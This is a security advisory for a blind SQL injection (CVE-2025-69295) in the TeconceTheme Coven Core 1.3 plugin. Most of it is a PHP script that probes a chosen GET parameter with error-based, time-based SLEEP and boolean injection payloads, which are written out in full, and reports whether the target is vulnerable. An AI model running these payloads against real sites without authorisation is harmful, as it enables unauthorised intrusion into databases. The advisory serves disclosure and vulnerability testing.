## https://sploitus.com/exploit?id=PACKETSTORM:216239
=============================================================================================================================================
| # Title : TeconceTheme Coven Core 1.3 Blind SQL Injection php Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://themeforest.net/user/teconcetheme |
=============================================================================================================================================
[+] Summary : A Blind SQL Injection vulnerability is reported in TeconceTheme Coven Core due to improper sanitization of user-supplied input in a GET parameter. The affected parameter is not named in this advisory; the accompanying scanner takes the parameter name as its -p argument, so the reader must identify it independently.
The vulnerability allows remote attackers to manipulate backend SQL queries via crafted payloads. Depending on server configuration and database behavior, this issue may be exploited using:
Error-based SQL Injection
Time-based Blind SQL Injection
Boolean-based Blind SQL Injection
Successful exploitation could allow attackers to:
Extract sensitive database information
Enumerate database structure
Bypass authentication mechanisms
Potentially escalate to full database compromise
The vulnerability is remotely exploitable without authentication if the affected parameter is publicly accessible.
[+] POC : (heuristic scanner, not a confirmed exploit — it reports a hit when the response contains database-error strings, when a SLEEP(5) payload adds about five seconds to the response time, or when two payloads produce responses of different length; each of these can also occur on a slow or dynamic page that is not vulnerable, so confirm any hit manually before reporting)
<?php
// Script-wide runtime settings for a long-running CLI scanner.
// Lift the execution-time cap first: the time-based probe deliberately waits
// several seconds per request.
set_time_limit(0);
// Silence PHP diagnostics so only the scanner's own status lines are printed.
error_reporting(0);
/**
 * Print the scanner's startup banner to stdout.
 *
 * Output is: a blank line, a rule, the tool title, a slightly longer rule,
 * and a trailing blank line — the same bytes as before, just assembled from
 * a single list of lines instead of five echo statements.
 */
function banner() {
    $lines = [
        "",
        "========================================================",
        " CVE-2025-69295 Blind SQLi Scanner (PHP) by indoushka",
        "=========================================================",
        "",
    ];
    echo implode("\n", $lines), "\n";
}
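/**
 * Fetch $url with a GET request and return the response body.
 *
 * Returns false on any transport error (DNS failure, connection refused,
 * timeout, ...). An HTTP error status (4xx/5xx) is NOT treated as failure:
 * the body is still returned, because the error-based probe needs to read
 * the error page.
 *
 * NOTE(review): TLS certificate verification is deliberately disabled so the
 * scanner works against self-signed lab targets. That makes every request
 * trivially interceptable by an on-path attacker, so only run this from a
 * host/network where that is acceptable.
 *
 * Changes vs. the original:
 *  - redirects are capped (CURLOPT_MAXREDIRS) and restricted to http/https,
 *    so a redirect loop or a redirect to another scheme cannot hang or
 *    divert the probe;
 *  - a separate connect timeout is set, so an unreachable host fails fast
 *    instead of consuming the whole transfer budget;
 *  - curl_exec() returning false is checked directly rather than only via
 *    curl_error().
 *
 * @param string    $url     Absolute URL to request.
 * @param int|float $timeout Overall transfer timeout in seconds.
 * @return string|false      Response body, or false on transport error.
 */
function http_request($url, $timeout = 5) {
    $timeoutSeconds = max(1, (int) $timeout);

    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL             => $url,
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_SSL_VERIFYPEER  => false,   // intentional: see NOTE(review) above
        CURLOPT_SSL_VERIFYHOST  => false,   // intentional: see NOTE(review) above
        CURLOPT_CONNECTTIMEOUT  => $timeoutSeconds,
        CURLOPT_TIMEOUT         => $timeoutSeconds,
        CURLOPT_FOLLOWLOCATION  => true,
        CURLOPT_MAXREDIRS       => 5,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_USERAGENT       => "Mozilla/5.0",
    ]);

    $response = curl_exec($ch);
    $error    = curl_error($ch);
    curl_close($ch);

    // curl_exec() returns false on failure; curl_error() is the human-readable
    // reason. Check both so neither can slip through as a "valid" response.
    if ($response === false || $error !== '') {
        return false;
    }
    return $response;
}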
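/**
 * Resolve the base URL to scan.
 *
 * If $target already carries an http:// or https:// scheme it is used as
 * given; otherwise https:// is tried first, then http://. The first candidate
 * that yields any response (regardless of HTTP status) is returned.
 *
 * Fix: the original tested strpos($target, "http") === 0, which also matched
 * bare host names beginning with "http" (e.g. "httpbin.example") and then
 * skipped scheme probing for them. The scheme is now matched explicitly and
 * case-insensitively.
 *
 * @param string    $target  URL, or bare host[:port][/path].
 * @param int|float $timeout Per-request timeout handed to http_request().
 * @return string|false      Reachable base URL, or false if none answered.
 */
function connect_target($target, $timeout) {
    if (preg_match('#^https?://#i', $target) === 1) {
        $candidates = [$target];
    } else {
        $candidates = ["https://" . $target, "http://" . $target];
    }

    foreach ($candidates as $url) {
        echo "[+] Trying: $url\n";
        if (http_request($url, $timeout) !== false) {
            echo "[] Connected: $url\n";
            return $url;
        }
    }
    return false;
}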
// Probe payloads shared by the three detection strategies below.

// Error-based: fragments that break a query built by string concatenation.
$ERROR_PAYLOADS = [
    "'",
    "\"",
    "'--",
    "' OR '1'='1",
];

// Time-based: SLEEP() is the MySQL/MariaDB form; other engines need a
// different delay function, so a miss here does not rule out SQLi.
$TIME_PAYLOAD = "' OR SLEEP(5)-- ";

// Boolean-based: a pair whose responses should differ only if the injected
// condition actually reaches the query.
$BOOLEAN_TRUE  = "' OR 1=1-- ";
$BOOLEAN_FALSE = "' OR 1=2-- ";
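/**
 * Error-based probe: inject each payload into $param and look for database
 * error text in the response.
 *
 * Changes vs. the original:
 *  - if the base URL already has a query string, the parameter is appended
 *    with "&" instead of a second "?" (which would have produced a broken
 *    URL and tested nothing);
 *  - a baseline request with a harmless value is fetched first, and only
 *    error text that is absent from the baseline counts — otherwise a page
 *    that always says "warning" or "mysql" somewhere is a permanent false
 *    positive;
 *  - the bare words "warning" and "mysql" are replaced by more specific
 *    database-error fragments.
 *
 * This remains a heuristic; confirm any hit manually.
 *
 * @param string    $url      Base URL (may already contain a query string).
 * @param string    $param    GET parameter name to inject into.
 * @param int|float $timeout  Per-request timeout in seconds.
 * @param string[]  $payloads Injection strings to try in order.
 * @return bool               true if any response contained a new error signature.
 */
function error_based_test($url, $param, $timeout, $payloads) {
    // Fragments typical of database error output; matched case-insensitively.
    $signatures = [
        "sql syntax",
        "warning: mysql",
        "mysql_fetch",
        "mysqli",
        "database error",
        "sql error",
        "unclosed quotation mark",
        "pg_query",
        "sqlite",
    ];

    $sep = strpos($url, '?') === false ? '?' : '&';

    // Baseline with a benign value so pre-existing error-like text is ignored.
    $baseline = http_request($url . $sep . $param . '=1', $timeout);
    if ($baseline === false) {
        $baseline = '';
    }

    foreach ($payloads as $payload) {
        $response = http_request($url . $sep . $param . '=' . urlencode($payload), $timeout);
        if ($response === false || $response === '') {
            continue;
        }
        foreach ($signatures as $needle) {
            if (stripos($response, $needle) !== false && stripos($baseline, $needle) === false) {
                return true;
            }
        }
    }
    return false;
}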
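/**
 * Time-based probe: send a delay payload and check whether the response took
 * at least $delay seconds longer than a harmless request.
 *
 * Changes vs. the original:
 *  - a baseline request is timed first, so a server that is simply slow
 *    (>= 5 s for every page) is no longer reported as vulnerable;
 *  - the expected delay is a parameter (default 5, matching the SLEEP(5)
 *    payload) instead of a hard-coded 5 inside the comparison;
 *  - the parameter is appended with "&" when the URL already has a query
 *    string.
 *
 * Both measurements are single samples, so network jitter can still produce
 * a false result either way; repeat the check before drawing a conclusion.
 *
 * @param string    $url     Base URL (may already contain a query string).
 * @param string    $param   GET parameter name to inject into.
 * @param int|float $timeout Normal per-request timeout; the probe requests
 *                           are allowed $timeout + $delay + 1 seconds.
 * @param string    $payload Delay payload (e.g. "' OR SLEEP(5)-- ").
 * @param int|float $delay   Seconds the payload is expected to add.
 * @return bool              true if the payload added at least $delay seconds.
 */
function time_based_test($url, $param, $timeout, $payload, $delay = 5) {
    $sep    = strpos($url, '?') === false ? '?' : '&';
    $budget = $timeout + $delay + 1;

    // Baseline: response time with a harmless value.
    $start = microtime(true);
    http_request($url . $sep . $param . '=1', $budget);
    $baselineSeconds = microtime(true) - $start;

    // Probe: response time with the delay payload.
    $start = microtime(true);
    http_request($url . $sep . $param . '=' . urlencode($payload), $budget);
    $probeSeconds = microtime(true) - $start;

    // Only the extra time attributable to the payload counts.
    return ($probeSeconds - $baselineSeconds) >= $delay;
}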
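/**
 * Boolean-based probe: compare the response to an always-true condition with
 * the response to an always-false one.
 *
 * Changes vs. the original:
 *  - a length difference alone is not enough: the TRUE request is repeated
 *    and must come back with the same length, otherwise the page is dynamic
 *    (nonces, timestamps, rotating content) and the difference is noise;
 *  - the parameter is appended with "&" when the URL already has a query
 *    string;
 *  - transport failures and empty bodies are rejected explicitly.
 *
 * Response length is still a coarse signal; confirm any hit manually.
 *
 * @param string    $url           Base URL (may already contain a query string).
 * @param string    $param         GET parameter name to inject into.
 * @param int|float $timeout       Per-request timeout in seconds.
 * @param string    $true_payload  Payload whose condition is always true.
 * @param string    $false_payload Payload whose condition is always false.
 * @return bool                    true if the two responses differ in length
 *                                 and the TRUE response is stable.
 */
function boolean_based_test($url, $param, $timeout, $true_payload, $false_payload) {
    $sep       = strpos($url, '?') === false ? '?' : '&';
    $true_url  = $url . $sep . $param . '=' . urlencode($true_payload);
    $false_url = $url . $sep . $param . '=' . urlencode($false_payload);

    $trueBody  = http_request($true_url, $timeout);
    $falseBody = http_request($false_url, $timeout);
    if ($trueBody === false || $trueBody === '' || $falseBody === false || $falseBody === '') {
        return false;
    }
    if (strlen($trueBody) === strlen($falseBody)) {
        return false;
    }

    // Stability check: the same request must reproduce the same length.
    $trueAgain = http_request($true_url, $timeout);
    if ($trueAgain === false || strlen($trueAgain) !== strlen($trueBody)) {
        return false;
    }
    return true;
}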
/**
 * Run the three SQLi probes against $param on $target and print a verdict.
 *
 * Reads the module-level payload variables via `global`. Every status line
 * is reproduced byte-for-byte from the original, since the output is what a
 * user of the script greps for.
 *
 * @param string    $target  URL or bare host, resolved through connect_target().
 * @param string    $param   GET parameter name to inject into.
 * @param int|float $timeout Per-request timeout in seconds.
 * @return void
 */
function scan($target, $param, $timeout) {
    global $ERROR_PAYLOADS, $TIME_PAYLOAD, $BOOLEAN_TRUE, $BOOLEAN_FALSE;

    $base_url = connect_target($target, $timeout);
    if (!$base_url) {
        echo "[!] Target unreachable\n";
        return;
    }

    // Label => probe; the label is spliced into the status lines below.
    $probes = [
        'Error-based' => function () use ($base_url, $param, $timeout, $ERROR_PAYLOADS) {
            return error_based_test($base_url, $param, $timeout, $ERROR_PAYLOADS);
        },
        'Time-based' => function () use ($base_url, $param, $timeout, $TIME_PAYLOAD) {
            return time_based_test($base_url, $param, $timeout, $TIME_PAYLOAD);
        },
        'Boolean-based' => function () use ($base_url, $param, $timeout, $BOOLEAN_TRUE, $BOOLEAN_FALSE) {
            return boolean_based_test($base_url, $param, $timeout, $BOOLEAN_TRUE, $BOOLEAN_FALSE);
        },
    ];

    $hits = 0;
    foreach ($probes as $label => $probe) {
        echo "\n[*] Testing {$label} SQLi...\n";
        if ($probe()) {
            echo "[] {$label} SQL Injection detected\n";
            $hits++;
        } else {
            echo "[] No {$label} SQL Injection\n";
        }
    }

    echo "\n=====================================\n";
    echo $hits > 0
        ? "[!!!] RESULT: TARGET IS VULNERABLE TO CVE-2025-69295\n"
        : "[] RESULT: TARGET NOT VULNERABLE\n";
    echo "=====================================\n";
}
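// Entry point: parse CLI options, validate them, and run the scan.
banner();
$options = getopt("t:p:", ["target:", "param:", "timeout:"]);

$target  = $options['t'] ?? $options['target'] ?? null;
$param   = $options['p'] ?? $options['param'] ?? null;
$timeout = $options['timeout'] ?? 5;

// getopt() returns an array when an option is repeated; keep the last value
// rather than passing an array into the URL builder.
if (is_array($target)) {
    $target = end($target);
}
if (is_array($param)) {
    $param = end($param);
}

if ($target === null || $target === '' || $param === null || $param === '') {
    echo "Usage:\n";
    echo "php scanner.php -t http://target.com/page.php -p id --timeout=5\n";
    exit(1); // non-zero so shell wrappers notice the misuse
}

// getopt() yields a string; reject non-numeric or non-positive values so a
// typo such as --timeout=abc does not silently become a 0-second timeout.
if (!is_numeric($timeout) || (float) $timeout <= 0) {
    echo "[!] --timeout must be a positive number of seconds\n";
    exit(1);
}
$timeout = max(1, (int) $timeout);

scan($target, $param, $timeout);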
?>
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================